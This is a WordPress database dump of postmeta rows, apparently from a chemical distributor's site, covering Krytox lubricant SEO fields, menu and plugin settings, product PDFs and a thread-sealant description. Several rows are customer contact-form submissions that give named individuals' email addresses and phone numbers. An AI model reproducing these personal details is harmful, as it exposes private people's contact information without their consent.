INSERT INTO `wp_postmeta` VALUES (20506, 2050, '_oembed_cdc37c9d525f07f1a32e2b1f81c865ea', '<blockquote data-secret="tiX8572QqP" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/products/">Products</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/products/embed/#?secret=tiX8572QqP" data-secret="tiX8572QqP" width="600" height="338" title="&#8220;Products&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (20507, 2050, '_oembed_time_cdc37c9d525f07f1a32e2b1f81c865ea', '1475068297'); 
INSERT INTO `wp_postmeta` VALUES (20508, 2050, '_yoast_wpseo_focuskw_text_input', 'Krytox'); 
INSERT INTO `wp_postmeta` VALUES (20509, 2050, '_yoast_wpseo_focuskw', 'Krytox'); 
INSERT INTO `wp_postmeta` VALUES (20510, 2050, '_yoast_wpseo_title', 'Krytox Lubricants | High Performance Greases & Oils | Full Product Catalog'); 
INSERT INTO `wp_postmeta` VALUES (20511, 2050, '_yoast_wpseo_metadesc', 'Miller-Stephenson is an authorized distributor of Krytox oils and greases. Krytox is oxygen safe and a nonflammable PFPE based lubricant.'); 
INSERT INTO `wp_postmeta` VALUES (20512, 2050, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20513, 2050, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20519, 2050, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (20520, 2050, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20521, 2050, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (20526, 2050, '_wp_old_slug', 'millerkrytox'); 
INSERT INTO `wp_postmeta` VALUES (20527, 2056, '_edit_lock', '1487863306:2'); 
INSERT INTO `wp_postmeta` VALUES (20528, 2056, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (20529, 2056, '_oembed_ea84c4d55400c995b17f4ea04bb8c797', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/XxJbQOWtIG0?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (20530, 2056, '_oembed_time_ea84c4d55400c995b17f4ea04bb8c797', '1487863295'); 
INSERT INTO `wp_postmeta` VALUES (20531, 2056, '_thumbnail_id', '1044'); 
INSERT INTO `wp_postmeta` VALUES (20534, 2056, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (20535, 2056, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20536, 2056, '_yoast_wpseo_focuskw_text_input', 'Krytox TS4'); 
INSERT INTO `wp_postmeta` VALUES (20537, 2056, '_yoast_wpseo_focuskw', 'Krytox TS4'); 
INSERT INTO `wp_postmeta` VALUES (20538, 2056, '_yoast_wpseo_title', 'Krytox TS4 Thread Sealant - Sealant & Tape Replacement'); 
INSERT INTO `wp_postmeta` VALUES (20539, 2056, '_yoast_wpseo_metadesc', 'High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.'); 
INSERT INTO `wp_postmeta` VALUES (20540, 2056, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (20541, 2056, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20542, 2056, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (20543, 122, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (20544, 122, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20545, 122, '_yoast_wpseo_content_score', '90'); 
INSERT INTO `wp_postmeta` VALUES (20546, 122, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20547, 2058, '_edit_lock', '1493822005:2'); 
INSERT INTO `wp_postmeta` VALUES (20548, 2058, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (20549, 2062, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (20550, 2062, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (20551, 2062, '_menu_item_object_id', '122'); 
INSERT INTO `wp_postmeta` VALUES (20552, 2062, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (20553, 2062, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (20554, 2062, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (20555, 2062, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (20556, 2062, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (20557, 989, '_wp_old_slug', 'ts4-krytox-thread-sealant'); 
INSERT INTO `wp_postmeta` VALUES (20558, 2065, '_edit_lock', '1475071564:2'); 
INSERT INTO `wp_postmeta` VALUES (20559, 2065, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (20560, 2065, '_ywtm_tab_type', 'global'); 
INSERT INTO `wp_postmeta` VALUES (20561, 2065, '_ywtm_show_tab', '1'); 
INSERT INTO `wp_postmeta` VALUES (20562, 2065, '_ywtm_order_tab', '8'); 
INSERT INTO `wp_postmeta` VALUES (20563, 2065, '_ywtm_icon_tab', 'a:3:{s:6:"select";s:4:"icon";s:4:"icon";s:24:"FontAwesome:toggle-right";s:6:"custom";s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (20564, 2065, '_ywtm_layout_type', 'default'); 
INSERT INTO `wp_postmeta` VALUES (20565, 2065, '_ywtm_enable_custom_content', '0'); 
INSERT INTO `wp_postmeta` VALUES (20566, 2065, '_ywtm_gallery_columns', '1'); 
INSERT INTO `wp_postmeta` VALUES (20567, 2065, '_ywtm_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (20568, 2065, '_ywtm_video', 'a:1:{s:7:"columns";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (20569, 2065, '_ywtm_google_map_full_width', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (20570, 2065, '_ywtm_google_map_width', '100'); 
INSERT INTO `wp_postmeta` VALUES (20571, 2065, '_ywtm_google_map_height', '100'); 
INSERT INTO `wp_postmeta` VALUES (20572, 2065, '_ywtm_google_map_overlay_address', ''); 
INSERT INTO `wp_postmeta` VALUES (20573, 2065, '_ywtm_google_map_overlay_zoom', '15'); 
INSERT INTO `wp_postmeta` VALUES (20574, 2065, '_ywtm_text_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (20575, 2065, '_ywtm_shortcode_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (20576, 989, '_oembed_ea84c4d55400c995b17f4ea04bb8c797', '<iframe width="1020" height="574" src="https://www.youtube.com/embed/XxJbQOWtIG0?feature=oembed" frameborder="0" allowfullscreen></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (20577, 989, '_oembed_time_ea84c4d55400c995b17f4ea04bb8c797', '1503409950'); 
INSERT INTO `wp_postmeta` VALUES (20578, 989, '2065_default_editor', 'https://www.youtube.com/watch?v=XxJbQOWtIG0'); 
INSERT INTO `wp_postmeta` VALUES (20579, 989, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (20580, 989, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (20581, 989, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (20582, 989, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (20583, 989, '_ywtm_content_tab_description', 'Krytox TS4 Thread Sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 Thread Sealant can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.'); 
INSERT INTO `wp_postmeta` VALUES (20584, 2067, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20585, 2067, '_seq_num', '2'); 
INSERT INTO `wp_postmeta` VALUES (20586, 2067, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20587, 2067, '_field_12', 'LAUREN WILSON'); 
INSERT INTO `wp_postmeta` VALUES (20588, 2067, '_field_13', 'ROSE MEDICAL'); 
INSERT INTO `wp_postmeta` VALUES (20589, 2067, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20590, 2067, '_field_14', 'lwilson@rosemedical.com'); 
INSERT INTO `wp_postmeta` VALUES (20591, 2067, '_field_15', '(616) 233-3000'); 
INSERT INTO `wp_postmeta` VALUES (20592, 2067, '_field_16', 'need an SDS for PTFE Release Agent DPMS-A0305B Dry Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (20593, 2067, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20594, 2067, '_sub_id', '2067'); 
INSERT INTO `wp_postmeta` VALUES (20595, 2058, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (20596, 2058, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (20597, 2068, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20598, 2068, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (20599, 2068, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (20600, 2068, '_menu_item_object_id', '2058'); 
INSERT INTO `wp_postmeta` VALUES (20601, 2068, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (20602, 2068, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (20603, 2068, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (20604, 2068, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (20605, 2068, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (20606, 2058, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20607, 2058, '_yoast_wpseo_title', 'Krytox Lubricants - High Performance - Industrial Overview'); 
INSERT INTO `wp_postmeta` VALUES (20608, 2058, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20609, 2058, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20610, 2073, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20611, 2073, '_seq_num', '6'); 
INSERT INTO `wp_postmeta` VALUES (20612, 2073, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20613, 2073, '_field_1', 'Jeff Chandler'); 
INSERT INTO `wp_postmeta` VALUES (20614, 2073, '_field_10', 'Graham Packaging'); 
INSERT INTO `wp_postmeta` VALUES (20615, 2073, '_field_2', 'Jeff.Chandler@grahampackaging.com'); 
INSERT INTO `wp_postmeta` VALUES (20616, 2073, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (20617, 2073, '_field_3', 'Do you have MSDS sheet available for MS-132BN Boron Nitride Extra High Temperature Release Agent / Dry Lubricant?\r\n\r\nRegards, Jeff'); 
INSERT INTO `wp_postmeta` VALUES (20618, 2073, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20619, 2073, '_sub_id', '2073'); 
INSERT INTO `wp_postmeta` VALUES (20622, 2050, '_wp_old_slug', 'krytox-application-overview'); 
INSERT INTO `wp_postmeta` VALUES (20625, 2050, '_wp_old_slug', 'krytox-html'); 
INSERT INTO `wp_postmeta` VALUES (20630, 2058, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20634, 2050, '_show_author_inthis_post', 'not_inthis_post'); 
INSERT INTO `wp_postmeta` VALUES (20635, 2087, '_wp_attached_file', '2016/09/tribosys-hydraulic-oil-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (20636, 2087, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:36:"2016/09/tribosys-hydraulic-oil-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"tribosys-hydraulic-oil-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"tribosys-hydraulic-oil-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (20639, 2050, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (20651, 2119, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20652, 2119, '_seq_num', '3'); 
INSERT INTO `wp_postmeta` VALUES (20653, 2119, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20654, 2119, '_field_12', 'Jarelis Roman'); 
INSERT INTO `wp_postmeta` VALUES (20655, 2119, '_field_13', 'Infotech Aerospace Services, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (20656, 2119, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20657, 2119, '_field_14', 'jarelis.roman2@pw.utc.com'); 
INSERT INTO `wp_postmeta` VALUES (20658, 2119, '_field_15', '(787) 609-4000'); 
INSERT INTO `wp_postmeta` VALUES (20659, 2119, '_field_16', 'Hi,\r\n\r\nI&#039;m a contractor for Pratt and Whitney company, providing support to update the MSDS Database. \r\n\r\nCould you please provide the MSDS for MS-222N and MS-222L? \r\n\r\nThank you in advance,\r\n\r\nJR'); 
INSERT INTO `wp_postmeta` VALUES (20660, 2119, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20661, 2119, '_sub_id', '2119'); 
INSERT INTO `wp_postmeta` VALUES (20663, 2129, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20664, 2129, '_seq_num', '7'); 
INSERT INTO `wp_postmeta` VALUES (20665, 2129, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20666, 2129, '_field_1', 'Linda Sullivan'); 
INSERT INTO `wp_postmeta` VALUES (20667, 2129, '_field_10', 'Raytheon Company'); 
INSERT INTO `wp_postmeta` VALUES (20668, 2129, '_field_2', 'linda_m_sullivan@raytheon.com'); 
INSERT INTO `wp_postmeta` VALUES (20669, 2129, '_field_8', '(978) 858-1010'); 
INSERT INTO `wp_postmeta` VALUES (20670, 2129, '_field_3', 'Is the connector lubricant MS-383H still available? Searches lead me to the page, but MS-383H is not one of the products listed. \r\nThank you,  Linda Sullivan'); 
INSERT INTO `wp_postmeta` VALUES (20671, 2129, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20672, 2129, '_sub_id', '2129'); 
INSERT INTO `wp_postmeta` VALUES (20673, 2135, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20674, 2135, '_seq_num', '4'); 
INSERT INTO `wp_postmeta` VALUES (20675, 2135, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20676, 2135, '_field_12', 'Lynn Bobenhausen'); 
INSERT INTO `wp_postmeta` VALUES (20677, 2135, '_field_13', 'MILLER-STEPHENSON CHEMICAL CO INC'); 
INSERT INTO `wp_postmeta` VALUES (20678, 2135, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20679, 2135, '_field_14', 'lynnb@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (20680, 2135, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (20681, 2135, '_field_16', 'Hi Zayan,\r\nCan you set me up to allow access to the SDS\r\nThanks\r\nLynn'); 
INSERT INTO `wp_postmeta` VALUES (20682, 2135, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20683, 2135, '_sub_id', '2135'); 
INSERT INTO `wp_postmeta` VALUES (20694, 2137, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20695, 2137, '_seq_num', '9'); 
INSERT INTO `wp_postmeta` VALUES (20696, 2137, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20697, 2137, '_field_1', 'Tom Montelli'); 
INSERT INTO `wp_postmeta` VALUES (20698, 2137, '_field_10', 'Bombardier aerospace inc.'); 
INSERT INTO `wp_postmeta` VALUES (20699, 2137, '_field_2', 'tom.montelli@aero.bombardier.com'); 
INSERT INTO `wp_postmeta` VALUES (20700, 2137, '_field_8', '(514) 855-2739'); 
INSERT INTO `wp_postmeta` VALUES (20701, 2137, '_field_3', 'Need to know Price Quote &amp; Delivery of part number MS-143H PTFE Release Agent Liquid Form. Has it been replaced? Could not find it in Web Site.  Also need copy of spec and MSDS if available. Please advise. Thank you'); 
INSERT INTO `wp_postmeta` VALUES (20702, 2137, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20703, 2137, '_sub_id', '2137'); 
INSERT INTO `wp_postmeta` VALUES (20704, 2138, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20705, 2138, '_seq_num', '10'); 
INSERT INTO `wp_postmeta` VALUES (20706, 2138, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20707, 2138, '_field_1', 'Joe Kotwis'); 
INSERT INTO `wp_postmeta` VALUES (20708, 2138, '_field_10', 'Dupont'); 
INSERT INTO `wp_postmeta` VALUES (20709, 2138, '_field_2', 'joseph.e.kotwis@dupont.com'); 
INSERT INTO `wp_postmeta` VALUES (20710, 2138, '_field_8', '(740) 474-0616'); 
INSERT INTO `wp_postmeta` VALUES (20711, 2138, '_field_3', 'I am looking for an oil for lubrication of moving plates in an oven.  The temperature range is 300 to 350C.  I am looking to replace Kleuber oil CH 2-280.  The oil would be a continuous feed....constantly pumping and replenishing.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (20712, 2138, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20713, 2138, '_sub_id', '2138'); 
INSERT INTO `wp_postmeta` VALUES (20724, 2058, '_thumbnail_id', '1653'); 
INSERT INTO `wp_postmeta` VALUES (20725, 2058, '_yoast_wpseo_focuskw_text_input', 'Krytox Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (20726, 2058, '_yoast_wpseo_focuskw', 'Krytox Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (20727, 2058, '_yoast_wpseo_metadesc', 'Krytox lubricants provide longer lasting lubrication that reduces frequency of re- lubrication, not only reducing operating costs, but also reducing waste.'); 
INSERT INTO `wp_postmeta` VALUES (20728, 2058, '_yoast_wpseo_linkdex', '89'); 
INSERT INTO `wp_postmeta` VALUES (20729, 2145, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20730, 2145, '_seq_num', '5'); 
INSERT INTO `wp_postmeta` VALUES (20731, 2145, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20732, 2145, '_field_12', 'KAREN SOULLIERE'); 
INSERT INTO `wp_postmeta` VALUES (20733, 2145, '_field_13', 'MICHIGAN SCIENTIFIC CORP'); 
INSERT INTO `wp_postmeta` VALUES (20734, 2145, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20735, 2145, '_field_14', 'kmsoulliere@michsci.com'); 
INSERT INTO `wp_postmeta` VALUES (20736, 2145, '_field_15', '(231) 547-5511'); 
INSERT INTO `wp_postmeta` VALUES (20737, 2145, '_field_16', 'Requesting the most current SDS for MS-136W DPMS U0316A2 Release Agent for Hot Molds'); 
INSERT INTO `wp_postmeta` VALUES (20738, 2145, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20739, 2145, '_sub_id', '2145'); 
INSERT INTO `wp_postmeta` VALUES (20740, 2146, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20741, 2146, '_seq_num', '6'); 
INSERT INTO `wp_postmeta` VALUES (20742, 2146, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20743, 2146, '_field_12', 'Mark Dietz'); 
INSERT INTO `wp_postmeta` VALUES (20744, 2146, '_field_13', 'Woodward'); 
INSERT INTO `wp_postmeta` VALUES (20745, 2146, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20746, 2146, '_field_14', 'mark.dietz@woodward.com'); 
INSERT INTO `wp_postmeta` VALUES (20747, 2146, '_field_15', '(224) 592-3327'); 
INSERT INTO `wp_postmeta` VALUES (20748, 2146, '_field_16', 'Hello,\r\n\r\nWe currently use Miller-Stepher Urathane Conformal Coating MS-470C that comes in a spray can.  This is also known as Parylene C.  Do you make the same product but in Parylene D?\r\n\r\nThank-you for your help,\r\n\r\nMark Dietz'); 
INSERT INTO `wp_postmeta` VALUES (20749, 2146, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20750, 2146, '_sub_id', '2146'); 
INSERT INTO `wp_postmeta` VALUES (20751, 2147, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20752, 2147, '_seq_num', '7'); 
INSERT INTO `wp_postmeta` VALUES (20753, 2147, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20754, 2147, '_field_12', 'KAREN SOULLIERE'); 
INSERT INTO `wp_postmeta` VALUES (20755, 2147, '_field_13', 'MICHIGAN SCIENTIFIC CORP'); 
INSERT INTO `wp_postmeta` VALUES (20756, 2147, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20757, 2147, '_field_14', 'kmsoulliere@michsci.com'); 
INSERT INTO `wp_postmeta` VALUES (20758, 2147, '_field_15', '(231) 547-5511'); 
INSERT INTO `wp_postmeta` VALUES (20759, 2147, '_field_16', 'Requesting most current SDS for MS-200N Aeroduster'); 
INSERT INTO `wp_postmeta` VALUES (20760, 2147, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20761, 2147, '_sub_id', '2147'); 
INSERT INTO `wp_postmeta` VALUES (20762, 2150, '_edit_lock', '1475508850:1'); 
INSERT INTO `wp_postmeta` VALUES (20763, 2150, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (20764, 2150, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (20765, 2150, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (20766, 2150, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20767, 2150, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20768, 2150, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20769, 2150, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20770, 2152, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20771, 2152, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20772, 2152, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (20773, 2152, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (20774, 2152, '_menu_item_object_id', '2150'); 
INSERT INTO `wp_postmeta` VALUES (20775, 2152, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (20776, 2152, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (20777, 2152, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (20778, 2152, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (20779, 2152, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (20780, 2157, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20781, 2157, '_seq_num', '12'); 
INSERT INTO `wp_postmeta` VALUES (20782, 2157, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20783, 2157, '_field_1', 'jason keresi'); 
INSERT INTO `wp_postmeta` VALUES (20784, 2157, '_field_10', 'Toyota'); 
INSERT INTO `wp_postmeta` VALUES (20785, 2157, '_field_2', 'jason.keresi@toyota.com'); 
INSERT INTO `wp_postmeta` VALUES (20786, 2157, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (20787, 2157, '_field_3', 'Hello, \r\nI am looking for a quote on some canned air. I only need maybe 6-8 cans.How do you guys sell it? By the case? I wasn&#039;t sure how to order or if I can order this directly through you or should I use a vendor and if so, Do you recommend anyone? Thanks for your time.\r\n\r\nBest regards,\r\nJason Keresi'); 
INSERT INTO `wp_postmeta` VALUES (20788, 2157, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20789, 2157, '_sub_id', '2157'); 
INSERT INTO `wp_postmeta` VALUES (20791, 1601, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (20792, 1601, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20793, 1601, '_yoast_wpseo_focuskw_text_input', 'Vazo free radical initiator'); 
INSERT INTO `wp_postmeta` VALUES (20794, 1601, '_yoast_wpseo_focuskw', 'Vazo free radical initiator'); 
INSERT INTO `wp_postmeta` VALUES (20795, 1601, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20796, 1601, '_yoast_wpseo_focuskeywords', '[{"keyword":"Peroxide initiators","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (20797, 1601, '_wp_old_slug', 'vazo-free-radical-initiator-benefits-and-uses'); 
INSERT INTO `wp_postmeta` VALUES (20798, 1601, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (20799, 1726, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20800, 1726, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20801, 1726, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20802, 1726, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20803, 1726, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20804, 2160, '_wp_attached_file', '2016/09/MS-122SE.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20805, 2161, '_wp_attached_file', '2016/09/MS-122XD.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20806, 2162, '_wp_attached_file', '2016/09/MS-143TE.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20807, 2163, '_wp_attached_file', '2016/09/MS-143XD.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20808, 2164, '_wp_attached_file', '2016/09/MS-242N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20809, 2165, '_wp_attached_file', '2016/09/MS-381H.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20810, 2166, '_wp_attached_file', '2016/09/MS-381HC-383H.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20811, 2167, '_wp_attached_file', '2016/09/MS-452N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20812, 2168, '_wp_attached_file', '2016/09/MS-460H_462H.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20813, 2169, '_wp_attached_file', '2016/09/MS-465C_467C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20814, 2170, '_wp_attached_file', '2016/09/MS-470C_472C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20815, 2171, '_wp_attached_file', '2016/09/MS-470S_472S.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20816, 2172, '_wp_attached_file', '2016/09/MS-475C_477C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20817, 2173, '_wp_attached_file', '2016/09/MS-530N_532N.pdf'); 
